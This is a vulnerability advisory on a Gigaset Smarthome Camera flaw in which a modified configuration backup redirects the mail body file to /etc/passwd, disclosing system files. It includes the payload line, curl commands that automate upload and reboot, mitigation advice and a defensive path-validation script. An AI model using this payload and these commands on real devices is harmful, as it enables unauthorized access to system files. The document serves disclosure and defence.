SIK-2016-047


Title:

Directory Traversal and Information Leakage Through Backup in Gigaset Smarthome Camera

Report ID

SIK-2016-047

Summary:

  • Vendor: Gigaset elements GmbH
  • Product: Gigaset Smarthome Camera
  • Affected Version: Firmware 1.10 (build 20140802)
  • Severity: medium
  • Short summary: Information leakage through the backup function by modifying the backup image.

Details:

The camera configuration interface allows the camera configuration to be backed up and restored. The backup file can be modified so that, after the manipulated backup is restored, more information can be gathered from the camera environment (access to system files). The configuration path for the default message body used when sending an information or alert mail can be redirected to other system paths and files. After a reboot, the content of the redirected file is shown in the message body box. Excerpt of the modified firmware backup file:

[smtp1]
...
MAILBODYFILE=/etc/passwd

The upload, reboot and read process can be automated:

curl -H 'Authorization: Basic YWRtaW46VEZWRFMwOVVWa1kzTmtJd01FRXdPRVl5UXpkWlEwRk5Wa1k9' \
     -F upload=@/home/ironic/teamsik/config.cfg 'http://10.148.207.32/form/restore'

curl -H 'Authorization: Basic YWRtaW46VEZWRFMwOVVWa1kzTmtJd01FRXdPRVl5UXpkWlEwRk5Wa1k9' \
     http://10.148.207.32/form/reboot

Workaround

In general, it is hard to define effective workarounds that guarantee the protection of the system. The attack is carried out by an internal attacker, so a secure network infrastructure is important.

Suggested Mitigation

The restore function of the configuration backup must verify the configuration path and restrict access to external paths. No system/OS path or file should be readable from the configuration interface.
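
A restore-time check along these lines is sketched below as an added example; it is not the vendor's fix or code from this report. The allowed directory /etc/mail/templates and the sample backups are assumptions constructed for illustration, and MAILBODYFILE is the only key taken from the advisory.

```python
import configparser
import posixpath

# Assumption: the only directory mail body templates may be loaded from.
TEMPLATE_DIR = "/etc/mail/templates"
# Path-valued keys; MAILBODYFILE is the only one named in the advisory.
PATH_KEYS = {"MAILBODYFILE"}


def path_is_confined(value, base=TEMPLATE_DIR):
    """True if value is an absolute path that normalises to a file below base.

    The check is lexical; on a device, also resolve symlinks (realpath)
    before opening the file.
    """
    if "\x00" in value or not value.startswith("/"):
        return False
    return posixpath.normpath(value).startswith(base.rstrip("/") + "/")


def check_backup(text):
    """Return a list of rejection reasons; an empty list means restore may proceed."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key case as written in the backup
    try:
        parser.read_string(text)  # strict mode: duplicate keys raise
    except configparser.Error as exc:
        return [f"unparseable backup: {type(exc).__name__}"]  # fail closed
    reasons = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if key.upper() in PATH_KEYS and not path_is_confined(value.strip()):
                reasons.append(f"[{section}] {key}={value} is outside {TEMPLATE_DIR}")
    return reasons


# Constructed sample backups (not taken from a real device).
SAMPLES = {
    "legitimate": "[smtp1]\nMAILBODYFILE=/etc/mail/templates/alert.txt\n",
    "advisory": "[smtp1]\nMAILBODYFILE=/etc/passwd\n",
    "dot-dot": "[smtp1]\nMAILBODYFILE=/etc/mail/templates/../../passwd\n",
    "duplicate": "[smtp1]\nMAILBODYFILE=/etc/mail/templates/a.txt\nMAILBODYFILE=/etc/passwd\n",
}

if __name__ == "__main__":
    for name, backup in SAMPLES.items():
        print(name, "->", check_backup(backup) or "accepted")
```

The whole backup is rejected when any path key fails the check or the file cannot be parsed unambiguously, so a restore never applies a partially validated configuration.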

Timeline

  • 2016-07-27 Vulnerability Discovered
  • 2016-08-15 Vulnerability Reported
  • 2016-09-14 Vulnerability Fixed